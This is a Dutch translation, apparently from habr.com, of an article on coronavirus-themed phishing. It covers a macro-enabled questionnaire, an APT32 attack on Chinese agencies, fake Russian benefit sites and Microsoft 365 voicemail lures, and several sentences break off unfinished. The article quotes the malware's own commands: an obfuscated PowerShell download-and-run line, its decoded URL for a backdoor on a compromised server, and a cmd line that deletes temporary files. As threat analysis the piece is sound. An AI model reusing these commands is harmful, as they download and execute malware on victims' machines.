Aanvallers blijven het COVID-19-onderwerp exploiteren en creëren steeds meer bedreigingen voor gebruikers die zeer geïnteresseerd zijn in alles wat met de epidemie te maken heeft. IN
Onthoud binnen
Wilt u een gratis test op COVID-19?
Een ander belangrijk voorbeeld van phishing met coronavirusthema was
Het overtuigen van de meeste gebruikers om macro's in te schakelen was ook eenvoudig. Hiervoor werd een standaardtruc gebruikt: om de vragenlijst in te vullen, moet je eerst macro's inschakelen, wat betekent dat je een VBA-script moet draaien.
Zoals u kunt zien, wordt het VBA-script speciaal gemaskeerd tegen antivirusprogramma's.
Windows heeft een wachtfunctie waarbij de toepassing /T <seconden> wacht voordat het standaardantwoord “Ja” wordt geaccepteerd. In ons geval wachtte het script 65 seconden voordat tijdelijke bestanden werden verwijderd:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
En terwijl we wachtten, werd er malware gedownload. Hiervoor is een speciaal PowerShell-script gelanceerd:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Na het decoderen van de Base64-waarde downloadt het PowerShell-script de achterdeur op de eerder gehackte webserver uit Duitsland:
http://automatischer-staubsauger.com/feature/777777.png
en slaat het op onder de naam:
C:UsersPublictmpdirfile1.exe
Map ‘C:UsersPublictmpdir’
wordt verwijderd bij het uitvoeren van het bestand 'tmps1.bat' dat de opdracht bevat cmd /c mkdir ""C:UsersPublictmpdir"".
Gerichte aanval op overheidsinstanties
Bovendien rapporteerden FireEye-analisten onlangs een gerichte APT32-aanval gericht op overheidsstructuren in Wuhan, evenals op het Chinese Ministerie van Noodbeheer. Eén van de gedistribueerde RTF's bevatte een link naar een artikel in de New York Times met de titel
Interessant is dat op het moment van detectie geen van de antivirussen dit exemplaar heeft gedetecteerd, aldus Virustotal.
Wanneer officiële websites offline zijn
Het meest opvallende voorbeeld van een phishing-aanval vond onlangs plaats in Rusland. Aanleiding hiervoor was de invoering van een langverwachte uitkering voor kinderen van 3 tot en met 16 jaar. Toen op 12 mei 2020 de start van het accepteren van aanvragen werd aangekondigd, haastten miljoenen zich naar de website van de Staatsdiensten voor de langverwachte hulp en brachten het portaal niet erger dan een professionele DDoS-aanval plat. Toen de president zei dat “de overheidsdiensten de stroom aanvragen niet aankonden”, begonnen mensen online te praten over de lancering van een alternatieve site voor het accepteren van aanvragen.
Het probleem is dat verschillende sites tegelijk begonnen te werken, en terwijl één, de echte op posobie16.gosuslugi.ru, daadwerkelijk applicaties accepteert, meer
Collega's van SearchInform vonden ongeveer 30 nieuwe frauduleuze domeinen in de .ru-zone. Infosecurity en Softline Company hebben sinds begin april meer dan zeventig vergelijkbare nepwebsites van overheidsdiensten gevolgd. Hun makers manipuleren bekende symbolen en gebruiken ook combinaties van de woorden gosuslugi, gosuslugi-70, vyplaty, covid-vyplaty, posobie, enzovoort.
Hype en social engineering
Al deze voorbeelden bevestigen alleen maar dat aanvallers met succes geld verdienen aan het onderwerp coronavirus. En hoe hoger de sociale spanning en hoe onduidelijker de kwesties, hoe groter de kans dat oplichters belangrijke gegevens stelen, mensen dwingen zelf hun geld op te geven of simpelweg meer computers hacken.
En aangezien de pandemie potentieel onvoorbereide mensen heeft gedwongen massaal thuis te werken, lopen niet alleen persoonlijke gegevens, maar ook bedrijfsgegevens gevaar. Zo werden onlangs ook Microsoft 365 (voorheen Office 365)-gebruikers het slachtoffer van een phishing-aanval. Mensen ontvingen massaal ‘gemiste’ gesproken berichten als bijlagen bij brieven. De bestanden waren echter feitelijk een HTML-pagina waar de slachtoffers van de aanval naartoe werden gestuurd
Bron: www.habr.com